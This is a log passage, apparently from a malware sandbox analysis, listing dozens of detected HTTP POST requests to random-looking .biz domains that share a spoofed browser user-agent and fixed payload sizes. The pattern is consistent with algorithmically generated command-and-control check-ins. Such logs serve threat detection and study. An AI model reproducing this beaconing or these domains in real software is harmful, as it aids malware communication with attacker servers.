Source: global traffic HTTP traffic detected: POST /bvawourmbxmjmarr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gytujflc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /uquynocac HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: qaynky.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /igs HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: bumxkqgxu.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /okedkgjfoq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: dwrqljrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /wfcpepuolxclud HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: xlfhhhm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mwes HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: nqwjmb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /im HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ifsaia.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /xhqdokiwwp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ytctnunms.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /na HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: myups.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /koph HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: myups.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /m HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: saytjshyf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rifyadu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: oshhkdluh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /lauq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: oshhkdluh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /owesbtnhccxha HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: saytjshyf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rte HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yunalwv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /p HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vcddkls.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /x HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yunalwv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /ceabvuhcchcwyyq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jpskm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /gcfjbafgheaeck HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /uextgbni HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lrxdmhrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /fvthsigvq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jftcpo HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: wllvnzb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /jdfcrnyhggjio HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: wllvnzb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /sarbnswr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: tbjrpv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /nhxpdndgorr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: deoci.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mxlx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gnqgo.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /bss HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jhvzpcfg.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /hckdbdnsiwd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gytujflc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /bh HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gytujflc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /dtupajxvn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: acwjcqqv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /fkcgbfiiatbbgsse HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: qaynky.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lfobofpdm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: acwjcqqv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /wstlg HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: bumxkqgxu.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /sn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vyome.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /ohrgkx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: dwrqljrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ovauxeggsejjr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yauexmxk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /vekxop HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: nqwjmb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gblgywtx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: iuzpxe.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /bjgrt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: iuzpxe.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /tpndpotka HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ytctnunms.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /dona HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: sxmiywsfv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /qylgmshijgs HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: myups.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /nur HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: myups.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /wveyxjtgsxs HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: oshhkdluh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /klflkg HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vrrazpdh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /cisadtlsyrfn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vrrazpdh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /y HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yunalwv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /xymnprgj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ftxlah.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /cjqgdtkxtfqqm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yunalwv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hmiutucdfnn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jpskm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /yhjy HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: typgfhb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /om HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lrxdmhrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gho HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: wllvnzb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ulgmbpj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /leqj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /ixcnnbyrmpnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /iuqfwfkapu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /ymsikktgwjcaw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rvfsblrqhy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /wiuuagnokpngbsx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kfmcpedbjr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /rifmhdkgmasf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /tbncyidxtibogxq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /eakdwqhsn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /bcjrqnssupbqc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /taks HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
